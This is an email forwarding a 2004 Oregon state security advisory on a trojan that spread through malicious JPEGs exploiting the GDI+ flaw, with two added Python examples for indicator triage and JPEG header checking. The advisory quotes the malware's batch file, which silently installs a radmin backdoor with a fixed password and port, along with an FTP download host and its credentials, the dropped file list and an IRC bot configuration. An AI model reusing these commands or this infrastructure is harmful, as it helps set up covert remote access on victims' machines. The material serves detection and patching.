[Oremem] SECURITY ADVISORY: New Windows threat confirmed

Phillip Barker BarkerP at co.curry.or.us
Tue Sep 28 19:11:40 EDT 2004


Hello Gary,

I just received this warning from the State of Oregon network security
office.
I thought you'd want to see this warning. Apparently the theoretical threat
from last week has now been used actively by hackers. If you have
Admin rights on your laptop please be sure to verify it's patched to the
current versions!

This looks pretty nasty!

Cheers,
Phil

####


ADVISORY NUMBER:  ORA04-057 

DATE ISSUED:  Tuesday, September 28, 2004 

STATE OF OREGON ENTERPRISE SECURITY OFFICE ADVISORY 

SUBJECT:  Microsoft GDI+ JPEG Processing Exploitation 

DESCRIPTION: 
ZDNET News recently posted an article titled "Trojan horse exploits image
flaw".  Easynews, mentioned in the article, actually identified and analyzed
the JPEGS posted to some usenet alt.binaries.erotica groups.  One JPEG was
posted Sun, 26 Sep 2004 19:19:51 while the other was identified Sun, 26 Sep
2004 20:12:42 MST.

Once this JPEG overflowed GDI+, it connected to the original site, then
connected to an FTP server and downloaded almost 2MB of data.  It then
installed a Trojan that registers itself as a service.  Most popular
anti-virus scanners are able to detect these exploit JPEGs, identifying
them as "Exploit-MS04-028" or "Bloodhound.Exploit.13" (Symantec).

It also installs radmin (radmin.com) running as 'r_server'.  It then
connects to the same IP that is in the USENET post headers.  Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba.  It downloads
these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll 
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe 
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt 
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll 
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll 
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe 
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log 
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe 
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat 
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx 
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg 
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat 
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log 
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll 
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe 
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe 
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe 
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll 
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll 
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe 
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll 
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg 
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe 
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe 
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe 
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe 

and executes 'execute.bat', which looks like: 

regedit.exe /s radmin.reg 
nvsvc.exe /install /silence 
nvsvc.exe /pass:hardcore /port:10002 /save /silence 
nvsvc.exe /start /silence 
net start r_server 

it also installs an irc client with this config info: 
server1=irc..net 
port1=7777 
login=Darkbro0d 
channel=#FurQ 
password=letmein 
nick1=Track100Mbit 
nick2=Trck100#1 
sfv=1 
user=Trackmaster 
login=darkbro0d 
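The file listing, execute.bat and IRC config above are usable as host and network indicators. The following is an added triage example, not part of the Oregon advisory or of any vendor tool: it parses an excerpt of the quoted ls -l listing into a name/size table, takes the FTP address, r_server service name, radmin port (10002) and IRC port (7777) from the advisory text, and runs constructed sample host records through those checks. The record format and the sample records are assumptions made for this example.

```python
"""Triage helper built from the indicators quoted in advisory ORA04-057.

Added example; the only page-sourced values are the IP, service name,
ports and the file listing excerpt. Everything else is constructed.
"""
import re
from typing import Dict, List

FTP_IP = "209.171.43.27"      # FTP host named in the advisory
RADMIN_SERVICE = "r_server"   # service started by execute.bat
RADMIN_PORT = 10002           # from "nvsvc.exe /port:10002"
IRC_PORT = 7777               # from "port1=7777" in the IRC config

# Excerpt (six of the 26 entries) of the ls -l listing quoted above.
FILE_LISTING = """\
-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
"""

# perms links owner group SIZE month day time NAME
LS_LINE = re.compile(
    r"^\S+\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)\s+\S+\s+\d+\s+\S+\s+(?P<name>.+?)\s*$"
)


def parse_listing(text: str) -> Dict[str, int]:
    """Map each file name in an ls -l listing to its size in bytes (names lower-cased)."""
    files: Dict[str, int] = {}
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if m:
            files[m.group("name").lower()] = int(m.group("size"))
    return files


DROPPED_FILES = parse_listing(FILE_LISTING)


def check_record(rec: dict) -> List[str]:
    """Return the indicator descriptions a single host/network record matches.

    Record schema (an assumption for this example):
      {"type": "netconn", "dst": ip, "dport": port}
      {"type": "listen",  "port": port}
      {"type": "service", "name": svc}
      {"type": "file",    "name": filename, "size": bytes}
    """
    hits: List[str] = []
    kind = rec.get("type")
    if kind == "netconn":
        if rec.get("dst") == FTP_IP:
            hits.append(f"outbound to advisory FTP host {FTP_IP}")
        if rec.get("dport") == IRC_PORT:
            hits.append(f"outbound IRC on port {IRC_PORT}")
    elif kind == "listen" and rec.get("port") == RADMIN_PORT:
        hits.append(f"listener on radmin port {RADMIN_PORT}")
    elif kind == "service" and rec.get("name", "").lower() == RADMIN_SERVICE:
        hits.append(f"service {RADMIN_SERVICE} registered")
    elif kind == "file":
        name = rec.get("name", "").lower()
        if name in DROPPED_FILES:
            # A name alone is weak (nc.exe, reg.exe are common admin tools);
            # a size match against the listing tightens the indicator.
            note = "size matches" if rec.get("size") == DROPPED_FILES[name] else "size differs"
            hits.append(f"dropped file {name} ({note})")
    return hits


def triage(records: List[dict]) -> Dict[int, List[str]]:
    """Run every record through check_record; keep only those with hits, keyed by index."""
    result: Dict[int, List[str]] = {}
    for i, rec in enumerate(records):
        hits = check_record(rec)
        if hits:
            result[i] = hits
    return result


# Constructed sample telemetry, not from any real host.
SAMPLE_RECORDS = [
    {"type": "netconn", "dst": "198.51.100.7", "dport": 443},        # benign
    {"type": "netconn", "dst": FTP_IP, "dport": 21},
    {"type": "netconn", "dst": "198.51.100.9", "dport": IRC_PORT},
    {"type": "listen", "port": RADMIN_PORT},
    {"type": "service", "name": "R_SERVER"},
    {"type": "file", "name": "nvsvc.exe", "size": 241664},
    {"type": "file", "name": "nvsvc.exe", "size": 4096},             # same name, other size
    {"type": "file", "name": "notepad.exe", "size": 69120},           # benign
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_RECORDS).items():
        print(idx, "; ".join(hits))
```

File-name hits on their own are the weakest of these indicators, since several of the listed names (nc.exe, reg.exe, kill.exe) are ordinary tools; the service name, the radmin port and the FTP address are far more specific to this incident and are the ones to alert on.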

SYSTEMS AFFECTED:  
This vulnerability affects the following Microsoft Windows operating systems
by default: 

Microsoft Windows XP and Microsoft Windows XP Service Pack 1 
Microsoft Windows XP 64-Bit Edition Service Pack 1 
Microsoft Windows XP 64-Bit Edition Version 2003 
Microsoft Windows Server 2003 
Microsoft Windows Server 2003 64-Bit Edition 

Other Microsoft Windows operating systems, including systems running
Microsoft Windows XP Service Pack 2, are not affected by default. However,
this vulnerability may affect all versions of the Microsoft Windows
operating systems if an application or update installs a vulnerable version
of the gdiplus.dll file onto the system.

Please note that this vulnerability affects any software that uses the
Microsoft Windows operating system or Microsoft's GDI+ library to render
JPEG graphics. Please see the Systems Affected section of the vulnerability
note to determine if third-party software is affected. A list of affected
Microsoft products is listed at the end of this advisory. Please see
Microsoft Security Bulletin MS04-028 for the complete list of affected and
non-affected Microsoft products.

RISK:  Severe. 

IMPACT:  By exploiting this vulnerability it is possible for an attacker to
run arbitrary code on target systems. Successful exploitation can be
leveraged to gain complete control over target systems, and may lead to
malware installation, exposure of confidential information, or further
network compromise. To be vulnerable to exploitation, a victim would have to
locally view or preview a malicious JPEG image on a vulnerable platform.
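Since the trigger is simply viewing a JPEG, a defender may want a structural pre-check that runs before an image reaches a GDI+-based viewer. The following is an added example, not code from the advisory or from Microsoft: it walks the marker segments of a JPEG header and reports any variable-length segment whose 16-bit length field is below 2 (the length counts its own two bytes, so anything smaller is malformed by the JPEG format; an undersized comment segment length is the condition associated with CAN-2004-0200). The two sample files are constructed inline; this is a format sanity check, not a replacement for the anti-virus signatures named above.

```python
"""Walk JPEG marker segments and flag undersized length fields.

Added example. The walker stops at SOS (start of entropy-coded data) or EOI,
which is sufficient because all metadata segments precede SOS.
"""
import struct
from typing import List, Tuple

SOI, EOI, SOS, COM, APP0 = 0xD8, 0xD9, 0xDA, 0xFE, 0xE0
# Markers that carry no length field: TEM, RST0-RST7, SOI, EOI.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))

Segment = Tuple[int, int, int]  # (offset, marker, declared length; 0 for standalone)


def walk_segments(data: bytes) -> Tuple[List[Segment], List[str]]:
    """Return (segments seen, findings). Parsing stops at the first malformed segment."""
    segs: List[Segment] = []
    findings: List[str] = []
    if len(data) < 2 or data[0:2] != b"\xff\xd8":
        findings.append("not a JPEG: missing SOI marker")
        return segs, findings
    segs.append((0, SOI, 0))
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            findings.append(f"expected marker byte 0xFF at offset {pos}")
            break
        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte, skip
            pos += 1
            continue
        if marker in STANDALONE:
            segs.append((pos, marker, 0))
            pos += 2
            if marker == EOI:
                break
            continue
        if pos + 4 > len(data):
            findings.append(f"truncated length field at offset {pos}")
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segs.append((pos, marker, length))
        if length < 2:
            findings.append(
                f"marker 0x{marker:02X} at offset {pos} declares length {length} (< 2)"
            )
            break
        if marker == SOS:
            break                   # entropy-coded data follows; header walk done
        pos += 2 + length
    return segs, findings


def undersized_segments(data: bytes) -> List[Segment]:
    """Segments whose declared length is below the 2-byte minimum."""
    segs, _ = walk_segments(data)
    return [s for s in segs if s[1] not in STANDALONE and s[2] < 2]


def _seg(marker: int, payload: bytes) -> bytes:
    """Build a correctly sized segment: marker, 2-byte length (incl. itself), payload."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed samples. GOOD_JPEG: SOI, APP0 (JFIF), COM "hello", SOS, EOI.
_APP0 = b"JFIF\x00" + b"\x01\x01" + b"\x00" + b"\x00\x01\x00\x01" + b"\x00\x00"
GOOD_JPEG = (
    b"\xff\xd8" + _seg(APP0, _APP0) + _seg(COM, b"hello")
    + _seg(SOS, b"\x01\x01\x00\x00\x3f\x00") + b"\xff\xd9"
)
# BAD_JPEG: identical, except the COM segment declares length 0 and carries no payload.
BAD_JPEG = (
    b"\xff\xd8" + _seg(APP0, _APP0) + b"\xff\xfe\x00\x00"
    + _seg(SOS, b"\x01\x01\x00\x00\x3f\x00") + b"\xff\xd9"
)

if __name__ == "__main__":
    for label, blob in (("good", GOOD_JPEG), ("bad", BAD_JPEG)):
        segs, findings = walk_segments(blob)
        print(label, [(o, hex(m), ln) for o, m, ln in segs], findings)
```

A check like this belongs at a mail gateway or proxy where images are stripped or quarantined, not in the viewer itself; the scanner is deliberately conservative and stops at the first malformed segment rather than trying to recover, since recovery logic is exactly where a parser becomes exploitable.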

RECOMMENDATIONS: 

Block all outbound connections to 209.171.43.27.  This IP address is
registered to Netfirms Inc and TELUS Communications Inc. of Toronto,
Ontario, Canada.

Apply patches from Microsoft. Apply the appropriate patches as specified in
Microsoft Security Bulletin MS04-028. Please note that this bulletin
provides several updates to the operating system and various applications
that rely on GDI+ to render JPEG images. Depending on your system's
configuration, you may need to install multiple patches. In addition to
releasing some patches on Windows Update, Microsoft has released some
patches on Office Update, and developer tool patches are available from
MS04-028.

Apply patches from third-party vendors. Third-party software that relies on
GDI+ to render JPEG images may also need to be updated. Apply the
appropriate patches specified by your vendor. Please see your vendor's
site and the Systems Affected section of the vulnerability note for more
information. Depending on your system's configuration, you may need to
install multiple patches.

Use caution with email attachments. Never open unexpected email attachments.
Before opening an attachment, save it to a disk and scan it with anti-virus
software. Make sure to turn off the option to automatically download
attachments.

View email messages in plain text. Email programs like Outlook and Outlook
Express interpret HTML code the same way that Internet Explorer does.
Attackers may be able to take advantage of that by sending malicious
HTML-formatted email messages.

Maintain updated anti-virus software. It is important that you use
anti-virus software and keep it up to date. Most anti-virus software vendors
frequently release updated information, tools, or virus databases to help
detect and recover from virus infections. Many anti-virus packages support
automatic updates of virus definitions.

Follow Microsoft recommendations for workarounds if patches cannot be
applied. Microsoft provides several workarounds for this vulnerability. Note
that these workarounds do not remove the vulnerability from the system, and
they will limit functionality. Please consult the "Workarounds for JPEG
Vulnerability - CAN-2004-0200" section of Microsoft Security Bulletin
MS04-028.

REFERENCES: 
ZDNet News 
http://news.zdnet.com/2100-1009_22-5385995.html 

Microsoft Security Bulletin MS04-028 
http://microsoft.com/technet/security/bulletin/MS04-028.asp 

Microsoft End User Security Bulletin for MS04-028 
http://www.microsoft.com/security/bulletins/200409_jpeg.mspx 

US-CERT Vulnerability Note VU#297462 
http://www.kb.cert.org/vuls/id/297462 

Microsoft KB Article 873374 
http://support.microsoft.com/?id=873374 

CVE CAN-2004-0200 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0200 



Phil Barker
Curry County 
Computer Services
Communication and Technical Support Manager
Gold Beach, Oregon 97444
541.247.3370 Desk
541.253.7550 Cellphone